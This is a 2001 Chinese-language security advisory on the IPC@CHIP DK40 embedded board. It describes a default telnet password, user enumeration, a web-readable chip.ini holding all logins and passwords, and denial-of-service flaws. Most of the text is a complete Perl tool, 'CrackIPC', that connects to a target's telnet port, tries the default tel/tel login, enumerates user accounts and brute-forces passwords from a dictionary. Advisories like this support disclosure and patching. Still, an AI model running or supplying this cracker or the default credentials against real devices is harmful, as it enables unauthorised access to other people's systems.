IPC@Chip 存在多项安全问题发布时间:2001-05-26 更新时间:2001-05-26 严重程度:高 威胁程度:远程管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 IPC@CHIP DK40 Evaluation Board详细描述 IPC@CHIP(http://www.bcl-online.de/mproducts/products.asp?id=1&status=en_products) 是一个完全嵌入-PC解决方案,其中包含了186处理器,RAM,FLASH-DISK,串口, ETERNET控制器和多个I/O PIN。此产品存在多项安全漏洞允许远程用户获得管理员权限 的访问,泄露信息和拒绝服务攻击。 TelnetD存在默认密码("tel").可以允许多次连接,存在暴力破解。默认情况 下只允许一个连接TELNETD,而默认情况下没有设置任何超时。通过分析TELNETD 的返回值可以发现存在的用户帐户。 WEBSERVER中的CHIP.INI攻击者可以通过http://ipcchipip/chip.ini获得chip.ini 文件其中存在所有LOGIN名和密码。 超长请求给服务器,将导致反映减慢。 发起SYN FLOOD操作,造成IPC停止响应。 ChipCfg脚本可以被下载,其中存在网络数据。(如. http://ipcchipip/ChipCfg). 测试代码 #!/usr/bi/perl -w ######################################################## # # # CrackIPC v0.2b # # # # Telnet implementation arcording to RFC 854 # # # # written 2001 by Siberian [Sentry-Security-Labs] # # # # Tested with: # # Active Perl (Windows NT) # # Perl 5.stable (Slackware 3.6 & 7.1) # # # # This Software is published under GPL v2 # # # # FOR EDUCATIONAL PURPOUSE ONLY! # # # # I can't be held responsible for any damgae caused # # by the software, direct or inderectly to anything # # or anyone. # # # ######################################################## # # # No animls were harmed during coding of this program, # # except some bugs, but we are sorry. # # # ######################################################## use Socket; sub guesspass { if(defined($pass = <FILE2>)) { chop($pass); $user2 = join '', $uda,chr(13),chr(10); send(SOCK,$user2,0); while(($out ne "P") && ($out ne "C")){ recv(SOCK,$out,1,0); } if($out eq "P") { print "Invalid username!"; } $pdas = $pass; $pass = join '', $pass,chr(13),chr(10); send(SOCK,$pass,0); while(($out ne "U") && ($out ne "I")){ recv(SOCK,$out,1,0); } recv(SOCK,$out,1,0); if($out eq "s") { print "\nWarning! Found valid password for account \"$uda\"! Password is \"$pdas\"\n"; exit 0; } } else { print "Can\'t crack the password!"; exit 0; } } sub guessuser { if($deftest == "0") { print "Checking DEFAULT login...\n"; $user = "tel"; $user = join '', $user,chr(13),chr(10); send(SOCK,$user,0); $deftest = "1"; while(($out ne "P") && ($out ne "C")){ recv(SOCK,$out,1,0); } if($out eq "P") { print "\nWarning! Valid DEFAULT account found! User:\"tel\" Pass:\"tel\"\n"; close(SOCK); close(FILE1); close(FILE2); exit 0; } } else { if(defined($user = <FILE1>)) { chop($user); $uda = $user; $user = join '', $user,chr(13),chr(10); send(SOCK,$user,0); while(($out ne "P") && ($out ne "C")){ recv(SOCK,$out,1,0); } if($out eq "P") { print "\nFound valid user account \"$uda\"! Tring to crack it...\n"; $fuser = $uda; } } else { print "Can\'t identify any valid user!"; exit 0; } } } sub conit { $iaddr = inet_aton($remote) or die "No target host computer found!"; $paddr = sockaddr_in(23, $iaddr); $prot = getprotobyname('tcp'); socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!"; connect(SOCK, $paddr) || die "Can't connect to target host!"; while(recv(SOCK,$out,1,0)) { if($fuser eq "") { if($out eq "i") { recv(SOCK,$out,1,0); if($out eq "o") { recv(SOCK,$out,1,0); if($out eq "n") { print "Connected to SC12... found Telnet Session!\n"; } } } if($out eq "g") { recv(SOCK,$out,1,0); if($out eq "i") { recv(SOCK,$out,1,0); if($out eq "n") { recv(SOCK,$out,1,0); if($out eq ":") { recv(SOCK,$out,1,0); guessuser(); } } } } } else { guesspass(); } } } print "\nIPC\@CHIP Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n"; print "Latest Version at www.sentry-labs.de.vu\n\n"; $remote = shift || die "usage: ./crackipc.pl [target host] (-u)[userfile (user)] [dictionary]"; $userf = shift || die "usage: ./crackipc.pl [target host] (-u) [userfile (user)] [dictionary]"; $passf = shift || die "usage: ./crackipc.pl [target host] [userfile (user)] [dictionary]"; if($userf eq "-u") { $fuser = $passf; $uda = $fuser; print "Attacking account \"$fuser\"...\n"; $passf = shift || die "usage: ./crackipc.pl [target host] [userfile (user)] [dictionary]"; open(FILE2, "$passf") || die "Can't open dictionary file!"; conit(); guesspass(); } $deftest = "0"; $fuser = ""; open(FILE1, "$userf") || die "Can't open usernames file!"; open(FILE2, "$passf") || die "Can't open dictionary file!";; conit(); close(FILE1); close(FILE2); close(SOCK); exit 0; 解决方案 尚无 相关信息 i.am.a at x-men.com |
